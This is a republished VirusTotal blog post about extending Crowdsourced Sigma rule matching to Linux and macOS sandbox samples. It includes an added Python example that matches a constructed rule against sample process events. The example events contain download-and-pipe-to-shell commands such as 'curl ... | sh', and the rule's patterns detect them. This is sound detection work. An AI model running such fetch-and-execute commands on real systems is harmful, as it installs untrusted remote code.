TLDR: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
We recently discussed how to maximize the value of Sigma rules by easily converting them to YARA Livehunts.
At that time Sigma rules were only matched against Windows binaries.
Our engineering team has worked hard to give Sigma lovers a better experience, increasing the value of Crowdsourced Sigma rules by extending matching to macOS and Linux samples.
Although we are still working on implementing Sysmon in our Linux and macOS sandboxes, we have implemented new features that allow Sigma rule matching based on the runtime behavior extracted from samples.
We have mapped all the fields used by Sigma rules with the information offered by our sandboxes, which allowed us to map rules for image load, process creation and registry set, among others.
About 54% of Crowdsourced Sigma rules for Linux and 96% for macOS are related to process creation, meaning we already have enough information to match all these with our sandboxes' output.
The following shell script sample produces 11 Crowdsourced Sigma rule matches.
Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa.
The new feature matching Sigma rules against Linux and macOS samples helped us identify some rules that may be too generic, which is not necessarily a problem as long as this is the intended behavior.
The rule seems a bit too generic since it only checks for a few strings in the command line, although it can be highly effective for generic detection of suspicious behavior.
This Sigma rule had about 9k hits in the last year alone, more than 300 of them on Linux or macOS samples.
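To illustrate how sandbox process-creation output is mapped onto Sigma fields and why a rule that only checks a few command-line strings fires across operating systems, here is an added example, not VirusTotal's code or a real Crowdsourced rule: it evaluates a constructed, deliberately generic Sigma-style rule against constructed Linux and macOS sandbox events. It implements only a subset of the Sigma specification, and the rule, event fields, URLs and the `matching_os` helper are assumptions made for illustration.

```python
"""Minimal Sigma process_creation matcher for sandbox events (added example,
not VirusTotal code). Rule and events are constructed; real sandbox output is
first mapped onto Sigma field names. Subset: contains/startswith/endswith/all."""
# Constructed rule mirroring Sigma YAML; a few generic strings fire on any OS.
RULE = {
    "title": "Download piped to shell or dropped in /tmp (constructed)",
    "logsource": {"category": "process_creation", "product": "linux"},
    "detection": {
        "selection": {
            "Image|endswith": ["/curl", "/wget"],
            "CommandLine|contains": ["| sh", "| bash", "-o /tmp/"],
        },
        "filter": {"ParentImage|endswith": "/apt-get"},  # benign package manager
        "condition": "selection and not filter",
    },
}

def _field_matches(key, value, event):
    field, *mods = key.split("|")                 # 'Field|mod1|mod2'
    actual = str(event.get(field, "")).lower()    # Sigma matching is case-insensitive
    wanted = [str(v).lower() for v in (value if isinstance(value, list) else [value])]
    ops = {"contains": lambda w: w in actual, "startswith": actual.startswith,
           "endswith": actual.endswith}
    test = next((ops[m] for m in mods if m in ops), actual.__eq__)
    return (all if "all" in mods else any)(test(w) for w in wanted)  # lists are OR'd

def _selection_matches(selection, event):
    return all(_field_matches(k, v, event) for k, v in selection.items())  # fields AND'd

def rule_matches(rule, event):
    det, cond = rule["detection"], rule["detection"]["condition"].split()
    hit = _selection_matches(det[cond[0]], event)
    if cond[1:3] == ["and", "not"]:               # 'selection and not filter'
        hit = hit and not _selection_matches(det[cond[3]], event)
    return hit

# Constructed process_creation events from a Linux and a macOS sandbox run.
EVENTS = [
    {"os": "linux", "Image": "/usr/bin/curl", "ParentImage": "/bin/bash",
     "CommandLine": "curl -fsSL http://example.invalid/x | sh"},
    {"os": "macos", "Image": "/usr/bin/curl", "ParentImage": "/bin/zsh",
     "CommandLine": "curl http://example.invalid/p -o /tmp/p"},
    {"os": "linux", "Image": "/usr/bin/wget", "ParentImage": "/usr/bin/apt-get",
     "CommandLine": "wget http://mirror.invalid/a.deb -o /tmp/a.deb"},  # filtered
    {"os": "macos", "Image": "/usr/bin/grep", "ParentImage": "/bin/zsh",
     "CommandLine": "grep -r sh | bash"},  # Image does not match: no hit
]
def matching_os(rule=RULE, events=EVENTS):
    # OS of each event the rule fires on; the Linux rule also hits macOS.
    return [e["os"] for e in events if rule_matches(rule, e)]
```

The rule tagged `product: linux` fires on the macOS event as well, which is the cross-platform effect described above, while the `filter` selection removes the package-manager download.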
Now let's see how it is possible to create a Livehunt rule based on Sysmon logs.
The sample we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors.
In the sample's JSON structure, the Sigma analysis results field is an array of objects containing all the relevant information about the matching Sigma rules, including details about the rule itself and the EVTX logs.
As explained in our post, by just clicking on the fields that you are interested in you can start building your Livehunt rule, and adjust values accordingly.
Some of the details found in Sysmon EVTX fields can be redundant with details provided in other more traditional fields that you use for your Livehunt rules through the YARA VT module.
At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples' behavior.
Remember that here you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.
This Cyber News was published on blog.virustotal.com. Publication date: Wed, 20 Dec 2023 12:43:05 +0000